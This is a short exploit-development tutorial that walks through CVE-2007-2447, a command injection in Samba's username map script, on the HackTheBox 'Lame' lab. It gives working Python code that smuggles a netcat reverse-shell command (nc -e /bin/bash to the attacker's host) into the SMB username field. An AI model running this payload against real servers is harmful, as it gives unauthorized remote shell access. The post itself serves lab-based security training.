ExploitDev Journey #6 | CVE-2007-2447 | Samba 3.0.20 < 3.0.25rc 'Username' map script' Command Execution
Original Exploit: https://www.exploit-db.com/exploits/16320
Exploit name: Samba username map script RCE
CVE: 2007-2447
Lab: Lame - HackTheBox
There is a vulnerability in Samba versions below 3.0.25 that allows an attacker to execute system commands by sending a malformed request as username to the SMB server.
Here is an example of using the nohup
command to create a directory:
Programmatically speaking /=
means divide and assignment operator usually used in loops. But why do we need to use it here?
The reason for using that is to divide the domain field and username field while sending the request, a better explanation can be found here.
We use the username field to open a netcat connection and connect to our server.
Writing the exploit is very easy because there is already a SMB Client library available for Python (install python3-samba package) so all you have to do is to use it like this:
username = f"/=`nohup nc -e /bin/bash {lhost} {lport}`"
conn = SMBConnection(username, '', '', '')
try:
print("Sending payload")
conn.connect(rhost, rport, timeout=10)
except Exception as e:
sys.exit(e)
Let's understand how SMBConnection
works, I provided the username
but what are the 3 other empty strings?
Those 3 other arguments are: password
, my_name
& remote_name
For purposes of making our exploit easy to read, we can explicitly write them along with their values but the values for the arguments after username
are not required:
conn = SMBConnection(username=username, password='', my_name='', remote_name='')
The following part is easier to understand, we use the instance of SMBConnection
class to make a connection and we provide target's IP, port and a timeout number in seconds:
conn.connect(rhost, rport, timeout=10)
In this exploit development session you learned about creating an SMB client and connecting to a SMB server. You also learned about Linux commands such as nohup
which you can later experiment around. You learned about connecting to your attacker machine from the victim machine using netcat which is something that might come useful in your exploit development journey.